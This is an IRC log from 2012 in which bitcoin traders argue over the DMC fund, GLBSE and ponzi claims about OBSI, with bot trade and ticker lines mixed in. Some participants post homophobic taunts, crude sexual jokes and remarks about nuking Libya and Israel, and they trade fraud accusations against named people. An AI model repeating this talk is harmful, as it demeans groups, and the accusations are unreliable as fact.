hands and rubbing it on your junk Sep 12 03:08:30 probably have to get some more work done Sep 12 03:08:38 [\\\]: cant, nefario refuses to release a list of shareholders. Sep 12 03:08:40 Diablo-D3: show those shareholders that they REALLY dont want you in charge Sep 12 03:08:43 <[\\\]> oh, right Sep 12 03:08:54 Diablo-D3: and redeem the GTFO jail free card nefario has haned you Sep 12 03:08:57 handed* Sep 12 03:09:00 <[\\\]> I wanna be CEO Sep 12 03:09:03 <[\\\]> its fun times. Sep 12 03:09:18 if this is what being CEO is like, I never want to be one again. Sep 12 03:09:20 usagi will step up and run DMC Sep 12 03:09:27 dub: he wont Sep 12 03:09:36 Diablo-D3: why not? Sep 12 03:09:39 I already asked him repeatedly to take over asset management so I can do dmc full time Sep 12 03:09:42 he already said no Sep 12 03:09:47 Diablo-D3: thats the best outcome for you Sep 12 03:09:52 he already wanted to launch UMC not much different to run DMC Sep 12 03:09:54 I liked his management style, but fuck him Sep 12 03:09:56 <[\\\]> asset management? Sep 12 03:09:57 usagi gets to be the scammer, not you Sep 12 03:10:03 <[\\\]> I nominate smickles Sep 12 03:10:07 <[\\\]> we'll throw it under S2cm Sep 12 03:10:13 s2cm? Sep 12 03:10:14 uh Sep 12 03:10:24 <[\\\]> investment thingymajiggy Sep 12 03:10:27 smickles appears to have at least half a brain Sep 12 03:10:27 [\\\]: nefario refuses to return the assets to DMC Sep 12 03:10:34 so he's not going to want this Sep 12 03:10:37 <[\\\]> smickles is good, we play nice Sep 12 03:10:47 actually smickles might work Sep 12 03:10:48 I doubt smickles wants to Sep 12 03:10:50 <[\\\]> dub, it can't be that bad Sep 12 03:10:54 if smickles puts his hand up to run DMC hes an idiot Sep 12 03:10:55 Diablo-D3: Did the vote fail? Sep 12 03:10:56 smickles is awesome Sep 12 03:11:01 nefario is attacking anyone associated with dmc Sep 12 03:11:10 midnightmagic: nefario will never issue the motion Sep 12 03:11:11 dub why ? proper inventory and all Sep 12 03:11:12 IM A WILD DOG GRRRRR Sep 12 03:11:22 DOG! Sep 12 03:11:22 IMA GONNA CUT YOU BITCH! Sep 12 03:11:24 mircea_popescu: dmc is not worth anything Sep 12 03:11:27 Huh? He said he would? I'm behind aren't I.. Sep 12 03:11:27 <[\\\]> woah Sep 12 03:11:37 midnightmagic: he SAID he would... next week Sep 12 03:11:45 next week is a pretty long ways away. Sep 12 03:11:53 Diablo-D3: what will you say when I issue the motion? Eat your words? Your hat? Sep 12 03:12:16 [GLBSE] [OBSI.HRPT] 35 @ 0.10165 = 3.5578 BTC [-] Sep 12 03:12:17 [GLBSE] [OBSI.HRPT] 39 @ 0.1017 = 3.9663 BTC [+] Sep 12 03:12:18 How many shares would I need to buy up a majority vote? Sep 12 03:12:21 no, I will just continue asking myself how far are you going to drag this farce along Sep 12 03:12:28 midnightmagic: 10k. Sep 12 03:12:43 Whats that 100BTC? Sep 12 03:12:47 1000 Sep 12 03:12:58 Oh, it's 0.1 right now? Sep 12 03:13:01 https://glbse.com/api/quantity_trading/DMC Sep 12 03:13:06 tnx Sep 12 03:13:08 I sell my 10 DMC shares for 0.99 !!! Plenty of fun granted! :-) Sep 12 03:13:09 !ticker dmc Sep 12 03:13:11 [GLBSE:DMC] [Bid: 0.049] [Ask: 0.05999999] [Spread: 0.01099999] [Last: 0.05999999] [24hVol: 1.31999978] [7dAvg: 0.06454165] Sep 12 03:13:18 okay fine, 500 Sep 12 03:13:36 [GLBSE] [FDBF] 20 @ 0.15 = 3 BTC [+] Sep 12 03:14:25 kakobrekla: you mean dog on the forum? Sep 12 03:14:42 he means dogging in a carpark Sep 12 03:14:45 Is there a cmd like ;;market buy? Sep 12 03:14:51 <[\\\]> yeah Sep 12 03:14:57 <[\\\]> is gribble here? Sep 12 03:15:03 <[\\\]> it is Sep 12 03:15:05 <[\\\]> just do it Sep 12 03:15:06 For glbse? Sep 12 03:15:07 not for glbse afaik Sep 12 03:15:09 <[\\\]> oh Sep 12 03:15:10 <[\\\]> no Sep 12 03:15:15 <[\\\]> because no one wrote it Sep 12 03:15:15 as kakobrekla Sep 12 03:15:19 <[\\\]> because the api doesn't exist Sep 12 03:15:19 ask* Sep 12 03:15:21 Yeah for majority vote lol Sep 12 03:15:28 !help Sep 12 03:15:28 List of commands: Sep 12 03:15:29 !ticker (desc: returns current GLBSE/MPEX ticker values) Sep 12 03:15:30 !pl [@] [] (desc: profit loss calc for GLBSE assets) Sep 12 03:15:35 thats what you get. Sep 12 03:15:38 <[\\\]> how many shares of dmc are outstanding Sep 12 03:15:45 20909 Sep 12 03:15:52 20k are "trading" Sep 12 03:16:06 998000 Sep 12 03:16:10 <[\\\]> do I dare ask what the last price is? Sep 12 03:16:10 (lol) Sep 12 03:16:19 !ticker dmc Sep 12 03:16:21 [GLBSE:DMC] [Bid: 0.049] [Ask: 0.05999999] [Spread: 0.01099999] [Last: 0.05999999] [24hVol: 1.31999978] [7dAvg: 0.06454165] Sep 12 03:16:22 0.06 Sep 12 03:16:22 lowest ask is 0.05 i think.. Sep 12 03:16:30 <[\\\]> ;;calc 20909 Sep 12 03:16:31 20909 Sep 12 03:16:33 hey, it was worse before. Sep 12 03:16:34 <[\\\]> ;;calc 20909*.05 Sep 12 03:16:34 1045.45 Sep 12 03:16:40 <[\\\]> so 1k buys the company? Sep 12 03:16:41 <[\\\]> shit Sep 12 03:16:44 <[\\\]> drop in the bucket Sep 12 03:16:53 and we have 1600 in assets Sep 12 03:16:57 [MPEX] [S.MPOE] 28883 @ 0.00039414 = 11.3839 BTC [-] Sep 12 03:16:58 thats how useless glbse is. Sep 12 03:16:59 [MPEX] [S.MPOE] 9998 @ 0.00039404 = 3.9396 BTC [-] Sep 12 03:17:03 <[\\\]> what are revenues? Sep 12 03:17:09 lol, this news of suspending Diablo-D3 has done nothing to the share price Sep 12 03:17:22 <[\\\]> I'm not implying it would Sep 12 03:17:24 <[\\\]> just gathering info Sep 12 03:17:27 <[\\\]> maybe I wanna buy some Sep 12 03:17:31 lol Sep 12 03:17:47 [\\\]: 80*2 over the first three months Sep 12 03:17:59 80 was paid as dividends Sep 12 03:18:17 [MPEX] [S.BVPS] 71 @ 0.00340764 = 0.2419 BTC [-] Sep 12 03:18:17 <[\\\]> what month is it now? Sep 12 03:18:18 [MPEX] [S.BVPS] 548 @ 0.0033989 = 1.8626 BTC [-] Sep 12 03:18:20 [MPEX] [S.BVPS] 20 @ 0.00338234 = 0.0676 BTC [-] Sep 12 03:18:21 [MPEX] [S.BVPS] 2000 @ 0.00337901 = 6.758 BTC [-] Sep 12 03:18:21 <[\\\]> 6? Sep 12 03:18:28 5. Sep 12 03:18:31 <[\\\]> I know its september before someone gets all smartass Sep 12 03:18:47 <[\\\]> what was div this last month? Sep 12 03:18:50 barely September Sep 12 03:18:54 :-) Sep 12 03:18:55 the fourth did not pay dividends as per motion voted by half the issued shares, 10:1 vote Sep 12 03:19:02 <[\\\]> wake me up when it ends Sep 12 03:19:15 Diablo-D3: How many shares do you own? Sep 12 03:19:20 midnightmagic: 40. Sep 12 03:19:23 <[\\\]> Diablo-D3, how many shares do you control? Sep 12 03:19:29 its all I could afford to buy Sep 12 03:20:02 <[\\\]> ;;calc 80/21000 Sep 12 03:20:03 0.00380952380952 Sep 12 03:20:08 lol Sep 12 03:20:15 [\\\]: except thats not accurate Sep 12 03:20:26 <[\\\]> ;;calc 0.00380952380952/.05 Sep 12 03:20:26 0.0761904761904 Sep 12 03:20:28 <[\\\]> wht's that? Sep 12 03:20:33 <[\\\]> why* Sep 12 03:20:50 https://bitcointalk.org/index.php?topic=77469.0 Sep 12 03:20:53 just check the financial reports Sep 12 03:20:58 <[\\\]> thanks Sep 12 03:21:02 <[\\\]> I should have asked for that sooner Sep 12 03:21:55 dub i would guess it still holds ~1k in assets. Sep 12 03:22:12 <[\\\]> So whats the gameplan for asic? obviously diff is skyrocketing and reward is halving Sep 12 03:22:21 <[\\\]> income's gotta be bottoming out Sep 12 03:22:40 mircea_popescu: 1k of mining bonds.. Sep 12 03:22:58 [\\\]: thankfully price has been up Sep 12 03:22:59 [MPEX] [S.MPOE] 4400 @ 0.00039418 = 1.7344 BTC [+] Sep 12 03:23:56 the price is ready for 25/block Sep 12 03:24:11 [\\\]: this is why I traded so heavily for asicminer Sep 12 03:26:07 but apparently Im this big evil bad wall street CEO for trying to get the only money thats going to be made for awhile Sep 12 03:26:57 you invested in s.dice ? Sep 12 03:26:58 [MPEX] [S.MPOE] 44302 @ 0.00039404 = 17.4568 BTC [-] Sep 12 03:27:00 [MPEX] [S.MPOE] 1798 @ 0.00039403 = 0.7085 BTC [-] Sep 12 03:27:03 man, I must buy 40 gallon drums of lube on amazon because I fuck investors so much Sep 12 03:27:04 Most of the accusations against you have been for incompetence, you'd never be allowed to work anywhere on wall street Sep 12 03:27:36 And from your people skills, I guess McDonalds is also out of the question Sep 12 03:27:43 [GLBSE] [BIB.BVPS] 89 @ 0.0045 = 0.4005 BTC [+] Sep 12 03:27:45 http://www.amazon.com/Passion-Natural-Water-Based-Lubricant-Gallon/dp/B005MR3IVO Sep 12 03:28:04 copumpkin: ... Sep 12 03:28:09 hell, with lubricant like that who needs a girl. Sep 12 03:28:44 bathe in it Sep 12 03:28:48 and you'll be able to fit everything Sep 12 03:29:01 nefario: Sorry, is there a post somewhere that details the specifics? I guess I missed it. Sep 12 03:29:25 midnightmagic: he keeps claiming my investors revolted Sep 12 03:29:42 I mean, they're pretty revolting, but why remind them of that in public Sep 12 03:29:51 https://bitcointalk.org/index.php?topic=77469.msg1182044#msg1182044 Sep 12 03:29:52 But it's in private? Sep 12 03:29:59 nope, right on the dmc thread. Sep 12 03:30:27 so all I can do is hope my investors arent sheep and do the right thing Sep 12 03:30:59 [MPEX] [S.MPOE] 29200 @ 0.00039418 = 11.5101 BTC [+] Sep 12 03:31:01 [MPEX] [S.MPOE] 10900 @ 0.0003956 = 4.312 BTC [+] Sep 12 03:31:23 Huh. That's strange. There's no way to get ownership certs issued or have a secret vote or something? Sep 12 03:32:09 Usagi, have I been attacking you? Sep 12 03:32:11 usagi: A really good reason to start using Open Transactions for asset issuance. :) Sep 12 03:32:15 threatening you? Sep 12 03:32:32 trying to coerce you? Sep 12 03:32:59 hmm Sep 12 03:33:09 I am a dog I guess Sep 12 03:33:18 lol Sep 12 03:33:28 you've been gone what 5 minutes? Sep 12 03:33:44 bitcoin time really goes fast. Sep 12 03:33:45 Diablo-D3: what say you? Sep 12 03:34:04 like being on LSD 24/7 Sep 12 03:34:04 Am I evil who controls all in my dominion with terror? Sep 12 03:34:43 He also said how many he has in his personal account Sep 12 03:34:48 and it was wrong Sep 12 03:34:56 not by a huge amount though Sep 12 03:35:06 nefario: Isn't.. that personal information? Sep 12 03:35:24 Depends Sep 12 03:35:32 Diablo is an issuer Sep 12 03:35:56 [GLBSE] [SS] 1 @ 0.01889 BTC [+] Sep 12 03:35:58 [GLBSE] [SS] 2 @ 0.0189 = 0.0378 BTC [+] Sep 12 03:36:18 [GLBSE] [FPGAMINING] 1 @ 0.742 BTC [-] Sep 12 03:36:18 and that Sep 12 03:36:19 [GLBSE] [FPGAMINING] 5 @ 0.7401 = 3.7005 BTC [-] Sep 12 03:36:20 [GLBSE] [FPGAMINING] 5 @ 0.74 = 3.7 BTC [-] Sep 12 03:36:21 [GLBSE] [FPGAMINING] 2 @ 0.738 = 1.476 BTC [-] Sep 12 03:36:22 [GLBSE] [FPGAMINING] 1 @ 0.735 BTC [-] Sep 12 03:36:24 [GLBSE] [FPGAMINING] 9 @ 0.733 = 6.597 BTC [-] Sep 12 03:36:25 [GLBSE] [FPGAMINING] 4 @ 0.7325 = 2.93 BTC [-] Sep 12 03:36:26 [GLBSE] [FPGAMINING] 3 @ 0.73220001 = 2.1966 BTC [-] Sep 12 03:36:27 [GLBSE] [FPGAMINING] 50 @ 0.7322 = 36.61 BTC [-] Sep 12 03:36:59 [MPEX] [S.MPOE] 16200 @ 0.00039427 = 6.3872 BTC [-] Sep 12 03:37:40 [GLBSE] [BDT] 6 @ 0.952 = 5.712 BTC [-] Sep 12 03:37:42 [GLBSE] [BDT] 8 @ 0.951 = 7.608 BTC [-] Sep 12 03:37:43 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 12 03:37:47 40 BTC-MINING * 0.928 = 37.12 Sep 12 03:37:47 951 BTCMC * 0.570045 = 542.112795 Sep 12 03:37:47 5113 OBSI.ABMO * 0.05 = 255.65 Sep 12 03:37:47 2080 ASICMINER * 0.1 = 208 Sep 12 03:37:47 1042.882795 BTC Value of whole asset Sep 12 03:37:47 = 0.04987722 BTC per share Sep 12 03:37:59 ok so that 1k btc pretty much accurate Diablo-D3 ? Sep 12 03:38:50 usagi: There's a cryptographic bit of software called open transactions which allows issuers to issue bits and pieces with cryptographic ownership attached, and there's all kinds of neat things one can do with them. Sep 12 03:39:23 lol Sep 12 03:39:23 [GLBSE] [OBSI.HRPT] 6 @ 0.1018 = 0.6108 BTC [+] Sep 12 03:39:25 so Sep 12 03:39:29 so much drama Sep 12 03:39:35 usagi: The guy writing it is FellowTraveler and he's in #opentransactions Sep 12 03:39:42 what size are business cards? Sep 12 03:39:48 w*h in mm? Sep 12 03:40:05 nefario: Well, participating in it doesn't help much. You're the one with the power to lock and unlock accounts. :) Sep 12 03:40:43 usagi: No it would solve ownership questions and would enable a bitcoin-backed cashlike currency which skips the blockchain. Sep 12 03:40:54 midnightmagic: I'm a fan of OpenTransactions, tried to use it at the begining of GLBSE Sep 12 03:41:29 nefario: Yeah I'm a fan too. FellowTraveler is really really verbose and happy to answer questions.. that's pretty rare. Sep 12 03:41:51 midnightmagic: the guy could talk the hind legs off a donkey Sep 12 03:41:56 i'm a sponsor of ot. it's a good ideea. Sep 12 03:41:56 [MPEX] [S.MPOE] 13700 @ 0.00039427 = 5.4015 BTC [-] Sep 12 03:42:13 i think they're still working on getting it ready for production, from what i talked to them Sep 12 03:43:08 It wasn't ready for production Sep 12 03:43:12 [GLBSE] [BFLS.RIG] 1 @ 0.979 BTC [+] Sep 12 03:43:15 this was over a year and 1/2 ago Sep 12 03:43:44 the problems OT is trying to solve are not the ones that need solving Sep 12 03:44:06 this may be the case yea Sep 12 03:44:33 [GLBSE] [BDK.BND] 23 @ 0.09989999 = 2.2977 BTC [-] Sep 12 03:45:17 usagi: not prevented Sep 12 03:45:20 reduced risk Sep 12 03:45:37 it's all about risk, more or less of it Sep 12 03:45:47 having everything anonymous makes risk massive Sep 12 03:45:52 sure Sep 12 03:45:55 lol, stocks are centrally-issued certs. Sep 12 03:45:55 still though Sep 12 03:45:58 doesn't prevent it Sep 12 03:46:07 Madoff Sep 12 03:46:14 ja Sep 12 03:46:18 but still did it Sep 12 03:46:24 as I said Sep 12 03:46:27 it reduces risk Sep 12 03:46:39 I agree Sep 12 03:46:55 a lot of what we see in bitcoin land is mob rule Sep 12 03:46:59 [MPEX] [S.MPOE] 11038 @ 0.00039403 = 4.3493 BTC [-] Sep 12 03:47:17 look at bitcoinica as an example Sep 12 03:49:04 Anyway Sep 12 03:49:15 running GLBSE I can see that having no regulation doesn't work Sep 12 03:49:17 sure Sep 12 03:49:55 not exactly SEC Sep 12 03:50:00 just rules for the market Sep 12 03:50:06 if there is a very large market Sep 12 03:50:11 and it has rules Sep 12 03:50:13 that works Sep 12 03:50:34 [MPEX] [S.MPOE] 28300 @ 0.00039416 = 11.1547 BTC [+] Sep 12 03:50:36 [MPEX] [S.MPOE] 5800 @ 0.00039559 = 2.2944 BTC [+] Sep 12 03:50:37 [MPEX] [S.MPOE] 24500 @ 0.0003956 = 9.6922 BTC [+] Sep 12 03:52:01 Too many markets with rules means too many rules Sep 12 03:52:14 should have 2-3 very large markets Sep 12 03:52:35 and either they will have totally separate rules, i.e. they are speciality markets Sep 12 03:52:43 or they've all got the same or similar rules Sep 12 03:55:00 [MPEX] [F.GIGA.ETF] 30819 @ 0.00044307 = 13.655 BTC [+] Sep 12 03:55:00 [MPEX] [F.GIGA.ETF] 5266 @ 0.00044441 = 2.3403 BTC [+] Sep 12 03:55:02 [MPEX] [S.MPOE] 33127 @ 0.00039403 = 13.053 BTC [-] Sep 12 03:56:17 so Sep 12 03:56:25 who wants to see my business card design? Sep 12 03:56:53 [08:38:03] ok so that 1k btc pretty much accurate Diablo-D3 ? Sep 12 03:56:54 no Sep 12 03:57:12 Oh HEY Diablo-D3 Sep 12 03:57:13 well what's missing ? or ? Sep 12 03:57:15 you're back Sep 12 03:57:18 its a lot less than that Sep 12 03:57:21 mircea_popescu: Ive issued that already Sep 12 03:57:21 and usagi is here too Sep 12 03:57:54 Diablo-D3: have a read on what usagi said, about me not threatening him, except for the sandwitch part Sep 12 03:57:56 dub it is ?! Sep 12 03:58:45 mircea_popescu: https://bitcointalk.org/index.php?topic=77469.msg1182260#msg1182260 Sep 12 03:59:30 [08:34:17] You said you didn't have a personal account then you mentioned you had a personal account Sep 12 03:59:38 I said I dont have a personal portfolio Sep 12 03:59:42 I _only_ hold DMC Sep 12 03:59:45 I have 40 shares of it Sep 12 03:59:59 [MPEX] [S.MPOE] 11862 @ 0.0003956 = 4.6926 BTC [+] Sep 12 04:00:00 [MPEX] [S.MPOE] 3351 @ 0.00039601 = 1.327 BTC [+] Sep 12 04:00:34 usagi: no, I also said I dont have other accounts Sep 12 04:00:36 I only have one Sep 12 04:00:53 later usagi Sep 12 04:00:54 54 BTC-MINING, currently valued 53.78 BTC Sep 12 04:00:54 951 BTCMC, currently valued 561.08 BTC Sep 12 04:00:54 9290 OBSI.ABMO, currently valued 929.00 BTC Sep 12 04:00:56 USAGI! Sep 12 04:00:59 o i see, so recent swaps ? Sep 12 04:01:04 mircea_popescu: yes Sep 12 04:01:14 bye Sep 12 04:01:17 tee hee hee Sep 12 04:01:33 mircea_popescu: abmo had a deal open to swap 1 asicminer for two abmo Sep 12 04:02:07 [GLBSE] [OBSI.HRPT] 4 @ 0.1018 = 0.4072 BTC [+] Sep 12 04:03:21 aha Sep 12 04:03:36 ;;ticker OBSI.ABMO Sep 12 04:03:36 (ticker [--bid|--ask|--last|--high|--low]) -- Return pretty-printed mtgox ticker. If one of the options is given, returns only that numeric result (useful for nesting in calculations). Sep 12 04:03:48 its 0.1 ask, Bugpowder Sep 12 04:03:52 and you want !ticker Sep 12 04:03:56 tx Sep 12 04:03:59 [MPEX] [F.GIGA.ETF] 36085 @ 0.00044164 = 15.9366 BTC [-] Sep 12 04:04:02 !ticker OBSI.ABMO Sep 12 04:04:04 [GLBSE:OBSI.ABMO] [Bid: 0.01000001] [Ask: 0.1] [Spread: 0.08999999] [Last: 0.1] [24hVol: 30.3] [7dAvg: 0.09616666] Sep 12 04:04:59 [MPEX] [F.GIGA.ETF] 9115 @ 0.00044164 = 4.0255 BTC [-] Sep 12 04:05:01 [MPEX] [F.GIGA.ETF] 12252 @ 0.00044081 = 5.4008 BTC [-] Sep 12 04:05:01 [MPEX] [F.GIGA.ETF] 23682 @ 0.00043813 = 10.3758 BTC [-] Sep 12 04:05:02 [MPEX] [F.GIGA.ETF] 28500 @ 0.00043685 = 12.4502 BTC [-] Sep 12 04:05:04 [MPEX] [F.GIGA.ETF] 29600 @ 0.00043606 = 12.9074 BTC [-] Sep 12 04:05:05 [MPEX] [F.GIGA.ETF] 18675 @ 0.00043115 = 8.0517 BTC [-] Sep 12 04:05:06 [MPEX] [F.GIGA.ETF] 26200 @ 0.00043067 = 11.2836 BTC [-] Sep 12 04:05:07 [MPEX] [F.GIGA.ETF] 23578 @ 0.00042423 = 10.0025 BTC [-] Sep 12 04:05:08 [MPEX] [F.GIGA.ETF] 25400 @ 0.00042197 = 10.718 BTC [-] Sep 12 04:05:09 [MPEX] [F.GIGA.ETF] 1600 @ 0.00041402 = 0.6624 BTC [-] Sep 12 04:05:10 [MPEX] [F.GIGA.ETF] 1398 @ 0.00041401 = 0.5788 BTC [-] Sep 12 04:07:17 mircea_popescu: also, not that it matters, I own half of abmo Sep 12 04:07:22 well, owned. Sep 12 04:07:27 now nefario does Sep 12 04:07:45 DMC shareholders Sep 12 04:07:57 the foil in your hat is too thick Sep 12 04:08:04 preventing needed ventelation Sep 12 04:08:24 yes, you're going to "liquidate" it and they get 50 btc. Sep 12 04:08:37 ZOMG THINK OF THE CHILDREN^WSHAREHOLDERS Sep 12 04:30:59 [MPEX] [S.MPOE] 11249 @ 0.00039601 = 4.4547 BTC [+] Sep 12 04:31:00 [MPEX] [S.MPOE] 5651 @ 0.00039661 = 2.2412 BTC [+] Sep 12 04:31:54 [GLBSE] [CPA] 40 @ 0.031 = 1.24 BTC [+] Sep 12 04:35:59 [MPEX] [F.GIGA.ETF] 41515 @ 0.00044437 = 18.448 BTC [+] Sep 12 04:36:00 [MPEX] [F.GIGA.ETF] 24502 @ 0.00041401 = 10.1441 BTC [-] Sep 12 04:36:02 [MPEX] [F.GIGA.ETF] 23800 @ 0.00040185 = 9.564 BTC [-] Sep 12 04:36:03 [MPEX] [F.GIGA.ETF] 183 @ 0.00039894 = 0.073 BTC [-] Sep 12 04:37:55 !ticker gigamining Sep 12 04:38:19 [GLBSE:GIGAMINING] [Bid: 0.59] [Ask: 0.6197] [Spread: 0.0297] [Last: 0.6197] [24hVol: 192.69492597] [7dAvg: 0.66033478] Sep 12 04:38:19 [GLBSE] [BFLS.RIG] 1 @ 0.85 BTC [-] **** BEGIN LOGGING AT Wed Sep 12 18:31:19 2012 Sep 12 18:32:23 This is how a ponzi collapses Sep 12 18:32:36 Bane_Capital: so we're all agreeing that glbse is a ponzi now? Sep 12 18:34:14 wow, I just scrolled up Sep 12 18:34:23 usagi is claiming obsi is a scammer Sep 12 18:34:25 http://polimedia.us/dtng/c/src/134654389322.png Sep 12 18:35:48 I am talking about Obsi Sep 12 18:35:56 Anyways, Nefario has shareholders to report to Sep 12 18:36:02 GLBSE isn't going anywhere. Sep 12 18:36:42 so how is obsi a ponzi? Sep 12 18:38:33 what graph? Sep 12 18:38:59 which issue? Sep 12 18:39:05 obsi has at least three different things Sep 12 18:39:19 oh Sep 12 18:39:24 no one gives a shit about hrpt Sep 12 18:39:28 I thought you meant his real issues Sep 12 18:39:44 [MPEX] [F.GIGA.ETF] 9400 @ 0.00039933 = 3.7537 BTC [+] Sep 12 18:44:26 [GLBSE] [MU] 3 @ 0.25 = 0.75 BTC [-] Sep 12 18:50:56 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Sep 12 18:51:57 [GLBSE] [BITBOND] 1 @ 0.387 BTC [+] Sep 12 18:52:29 [GLBSE] [FDBF] 5 @ 0.15 = 0.75 BTC [+] Sep 12 18:57:19 good evening Sep 12 18:57:36 hi Sep 12 18:59:21 [10:38:41] Boy am I glad I started selling out my OBSI earlier before the crash Sep 12 18:59:22 [10:38:53] No way I'm getting stuck in another ponzi but now I'm trapped Sep 12 18:59:22 [10:38:58] I have like, several thousand shares to sell Sep 12 18:59:22 [10:39:03] and it's under .1 Sep 12 19:01:03 [MPEX] [O.BTCUSD.P080N] 8 @ 0.11663206 = 0.9331 BTC [+] Sep 12 19:01:04 you used the word ponzi and said obsi is the ponzier. Sep 12 19:01:07 ponziist? Sep 12 19:01:15 ponzniteer. Sep 12 19:01:41 Obsi screams poor investment Sep 12 19:01:57 Bane_Capital: YEAH, HOW CAN WE COMPETE WITH PIRATE'S 7%... oh wait Sep 12 19:01:57 i thought she was a girl. Sep 12 19:02:04 mircea_popescu: usagi is a guy. Sep 12 19:02:17 usagi is a twink, but i was talking about obsi Sep 12 19:02:24 obsis a girl now?! Sep 12 19:02:25 wtf Sep 12 19:02:26 I'll change my name to Charles Ponzi for 10k BTC Sep 12 19:02:37 ill give you 7.55 chmod 755 Sep 12 19:02:54 I'll give you .0755 Sep 12 19:02:54 patable in wright debt. Sep 12 19:03:01 payable* Sep 12 19:03:05 mircea_popescu: OBJECTION! Sep 12 19:03:11 overruled. Sep 12 19:03:24 what? thats not how that works Sep 12 19:03:33 :D Sep 12 19:03:50 looking to trade wright debt for pirate debt Sep 12 19:03:56 lol Sep 12 19:04:11 chmod755, you really need that magazines eh Sep 12 19:04:12 :) Sep 12 19:04:20 ah Sep 12 19:04:23 dont need Sep 12 19:05:44 I dont care what you do with your personal life Sep 12 19:05:48 [GLBSE] [OBSI.HRPT] 1 @ 0.09599997 BTC [+] Sep 12 19:05:49 but you're not a girl Sep 12 19:06:06 Im not going to fucking dox people Sep 12 19:06:12 ahahah there should be a flea market Sep 12 19:06:13 what is this, #anonymouscentral? Sep 12 19:06:18 trading pirate debt for hashking debty etc Sep 12 19:06:29 mircea_popescu: fuck, we've turned into wall street Sep 12 19:07:06 I dont care if you and nefario are having a gay man on man homo sex relationship, its none of my business. Sep 12 19:07:16 but dont go around claiming you're a girl on the internet Sep 12 19:07:20 because, frankly, no one gives a fuck Sep 12 19:07:28 He's trying to be funny Sep 12 19:07:33 i give fucks. Sep 12 19:07:35 but he just seems Sep 12 19:07:41 Weird Sep 12 19:07:53 if you're that starved for attention, just hire a prostitute Sep 12 19:08:18 Bruce Wagner? lol Sep 12 19:08:20 dear lord, usagi's brain is made by IBM Sep 12 19:08:23 I have no idea. Sep 12 19:09:04 dear lord, a loli vampire who's brain is made by IBM Sep 12 19:09:31 i am a crazy libyan Sep 12 19:09:42 jcpham: heavy. Sep 12 19:09:54 dude i'll burn your consolate down Sep 12 19:10:02 you can't even spell consulate Sep 12 19:10:04 Whoever translated that Muhammad blasphemy video achieved the highest level of trolling possible. Sep 12 19:10:07 exactly Sep 12 19:10:12 yeah, I think its pretty much time to nuke libya Sep 12 19:10:15 I am pretty sure it was a Mossad agent. Sep 12 19:10:24 Who wants US military welfare for Israel. Sep 12 19:10:31 Bane_Capital: yes, a mossad agent killed a rather well known video game player Sep 12 19:10:38 I say we nuke israel Sep 12 19:10:50 Diablo-D3: You're going to get the JIDF in here. Sep 12 19:10:52 mircea_popescu: koran Sep 12 19:10:52 anyone want to see me burn the coran to fry meat opn the flame ? Sep 12 19:10:55 w/e Sep 12 19:10:56 that's amazing mircea_popescu Sep 12 19:11:00 can you link me to it Sep 12 19:11:05 mkay, lemme dig for it Sep 12 19:11:12 ty Sep 12 19:11:16 so, I think what Im going to do Sep 12 19:11:17 http://trilema.com/2011/barbecuran/ Sep 12 19:11:18 is start a religion Sep 12 19:11:19 there Sep 12 19:12:26 if i re-upload it to youtube will you get mad Sep 12 19:12:35 i'll keep it private and only share with my friends Sep 12 19:12:38 put a link to source i dun care. Sep 12 19:12:41 you can make it public. Sep 12 19:12:46 ok Sep 12 19:12:49 will do Sep 12 19:12:59 heck, april 2011 its been a year and a half. Sep 12 19:13:07 i think this is absolutely clear proof that it's not the video that did it. Sep 12 19:15:18 !ticker FDBF Sep 12 19:15:22 [GLBSE:FDBF] [Bid: 0.14] [Ask: 0.15] [Spread: 0.01] [Last: 0.15] [24hVol: 9.75] [7dAvg: 0.14998275] Sep 12 19:15:23 !ticker ABM Sep 12 19:15:25 [GLBSE:ABM] [Bid: 0.0001] [Ask: 0.2] [Spread: 0.1999] [Last: 0.1] [24hVol: ] [7dAvg: 0.1] Sep 12 19:18:12 [GLBSE] [OBSI.HRPT] 2 @ 0.08201001 = 0.164 BTC [-] Sep 12 19:18:14 [GLBSE] [OBSI.HRPT] 1 @ 0.08201 BTC [-] Sep 12 19:18:15 [GLBSE] [OBSI.HRPT] 1 @ 0.082 BTC [-] Sep 12 19:18:16 [GLBSE] [OBSI.HRPT] 20 @ 0.082 = 1.64 BTC [-] Sep 12 19:18:18 [GLBSE] [OBSI.HRPT] 99 @ 0.081 = 8.019 BTC [-] Sep 12 19:18:18 [GLBSE] [OBSI.HRPT] 100 @ 0.0809 = 8.09 BTC [-] Sep 12 19:18:19 [GLBSE] [OBSI.HRPT] 220 @ 0.0809 = 17.798 BTC [-] Sep 12 19:18:20 [GLBSE] [OBSI.HRPT] 11 @ 0.08080808 = 0.8889 BTC [-] Sep 12 19:18:21 [GLBSE] [OBSI.HRPT] 43 @ 0.08 = 3.44 BTC [-] Sep 12 19:18:39 lol Sep 12 19:21:43 I wish sleep wasn't needed Sep 12 19:23:00 Look what you did Diablo-D3 Sep 12 19:23:05 That was the JIDF Sep 12 19:23:11 checking on this place Sep 12 19:25:01 [GLBSE] [OBSI.HRPT] 7 @ 0.08 = 0.56 BTC [-] Sep 12 19:25:34 [GLBSE] [OBSI.HRPT] 14 @ 0.079 = 1.106 BTC [-] Sep 12 19:25:54 so im guessing, "great that i didn't buy obsi" ? Sep 12 19:26:02 [GLBSE] [OBSI.HRPT] 50 @ 0.078 = 3.9 BTC [-] Sep 12 19:26:04 was sorta half thinking about throwing a hundred or two that way Sep 12 19:26:34 [GLBSE] [OBSI.HRPT] 5 @ 0.0771 = 0.3855 BTC [-] Sep 12 19:27:51 [GLBSE] [OBSI.HRPT] 100 @ 0.077 = 7.7 BTC [-] Sep 12 19:28:02 [MPEX] [S.MPOE] 24501 @ 0.00039824 = 9.7573 BTC [+] Sep 12 19:28:04 [MPEX] [S.MPOE] 26523 @ 0.00039841 = 10.567 BTC [+] Sep 12 19:28:34 [GLBSE] [OBSI.HRPT] 2 @ 0.075 = 0.15 BTC [-] Sep 12 19:28:34 It might just be FUD Sep 12 19:28:41 OBSI might have a chance Sep 12 19:28:48 hence why people are still buying it Sep 12 19:29:42 it is FUD Sep 12 19:29:56 you should be fearful, uncertain and doutful though when you read the terms of OBSI.HRPT Sep 12 19:30:31 EskimoBob: https://bitcointalk.org/index.php?topic=91646.msg1184140#msg1184140 why fold when there is more profit ahead? Sep 12 19:31:41 http://youtu.be/B2w6ffT8iXM Sep 12 19:32:07 look ma! i'm famous on the interwebs nao Sep 12 19:32:15 i don't know what he's saying! Sep 12 19:32:19 but i want to do it! 